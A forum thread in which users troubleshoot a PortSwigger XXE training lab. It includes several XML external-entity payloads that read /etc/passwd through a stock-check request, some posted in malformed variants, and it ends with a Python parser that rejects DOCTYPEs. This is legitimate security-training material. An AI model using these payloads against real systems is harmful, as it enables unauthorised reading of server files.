Burp Suite User Forum


Lab: Exploiting XXE using external entities to retrieve files

Regan | Last updated: Jun 15, 2019 03:19PM UTC

Relevant Links:
https://portswigger.net/web-security/xxe
https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

I am trying to complete this lab and I am unsure what I am doing wrong. Any help would be greatly appreciated. I have tried many variants of the syntax, but basically, the HTTP request is below:

-------------------------------------------
POST /product/stock HTTP/1.1
Host: acfc205d38843c2c80fd980100af0078.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acfc205d38843c2c80fd980100af0078.web-security-academy.net/product?productId=13
Cookie: session=aDJvRrAxYrf804mh6rJzMmjl2195R7IN
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 168

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
-------------------------------------------

Then I get the following response in Burp Suite:

-------------------------------------------
HTTP/1.1 400 Bad Request
Date: Sat, 15 Jun 2019 14:23:02 GMT
Content-Type: application/json
Content-Length: 86
Connection: close
Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'; style-src 'self'; frame-src 'self'; connect-src 'self' ws://localhost:3333; font-src 'self'; media-src 'self'; object-src 'none'; child-src 'self' blob:
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY

"XML parser exited with non-zero code 1: Content is not allowed in trailing section. "
-------------------------------------------

Thank you.

PortSwigger Agent | Last updated: Jun 17, 2019 08:09AM UTC

I just checked this lab and the solution is working correctly for me. Please ensure Repeater is configured to automatically update Content-Length.

Burp User | Last updated: Jun 19, 2019 08:19PM UTC

I am getting the same results as Regan. Content-Length seems to be related to request headers, not Repeater. Can somebody help?

Burp User | Last updated: Jun 20, 2019 03:09AM UTC

Use Repeater instead of Intruder. I used the snippet below and got the expected results!

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Burp User | Last updated: Dec 05, 2019 10:22AM UTC

Is it because you are using Windows? Windows doesn't have a file named /etc/passwd.

Burp User | Last updated: Feb 09, 2020 08:52AM UTC

@Daniel You are using a web application, not accessing your own system. When you access any website, for example Facebook or Portswigger.net, it depends on which server PortSwigger is using, not on which operating system you're using. You just access their services via the browser.

And the answer:

    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    <?xml version="1.0" encoding="UTF-8"?>
    <stockCheck>
    <productId>&xxe;</productId>
    <storeId>1</storeId>
    </stockCheck>

or

    <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe; ]>
    <?xml version="1.0" encoding="UTF-8"?>
    <stockCheck>
    <productId>1</productId>
    <storeId>1</storeId>
    </stockCheck>

yusuf | Last updated: May 16, 2021 12:08PM UTC

    <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Please make sure you try this. Don't forget &xxe between productId.
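
Seen from the server side, every request body posted in this thread relies on the parser accepting a DOCTYPE that declares an external entity. The following is an added example, not code from the thread or from PortSwigger: a Python stock-check parser that refuses any DOCTYPE and accepts only integer `productId` and `storeId` values. The names `parse_stock_check` and `RejectedXML` are assumptions, and the lab's real backend is not shown on this page.

```python
import re
import xml.parsers.expat

# Body as posted in the thread (external entity declared in a DOCTYPE).
THREAD_BODY = (b'<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [ <!ENTITY xxe '
               b'SYSTEM "file:///etc/passwd"> ]><stockCheck><productId>&xxe;'
               b'</productId><storeId>1</storeId></stockCheck>')
# Constructed benign request for comparison.
BENIGN_BODY = (b'<?xml version="1.0" encoding="UTF-8"?>'
               b'<stockCheck><productId>13</productId><storeId>1</storeId></stockCheck>')

class RejectedXML(ValueError):
    """Request refused before any stock lookup happens."""

def parse_stock_check(body: bytes) -> dict:
    fields, stack, text = {}, [], []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # A stock check never needs a DTD, so no entity can ever be declared.
        raise RejectedXML("DOCTYPE declarations are not accepted")

    def on_start(name, attrs):
        stack.append(name)
        text.clear()

    def on_end(name):
        # Record only direct children of the <stockCheck> root.
        if len(stack) == 2 and stack[0] == "stockCheck":
            fields[name] = "".join(text)
        stack.pop()

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = text.append
    try:
        parser.Parse(body, True)
    except xml.parsers.expat.ExpatError:
        # Generic message: parser internals are not echoed back to the client.
        raise RejectedXML("malformed XML") from None

    result = {}
    for key in ("productId", "storeId"):
        value = fields.get(key, "").strip()
        if not re.fullmatch(r"[0-9]{1,9}", value):
            raise RejectedXML(f"{key} must be an integer")
        result[key] = int(value)
    return result
```

Rejecting the DOCTYPE outright covers both the general-entity and parameter-entity variants posted above, since neither can be declared without one.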
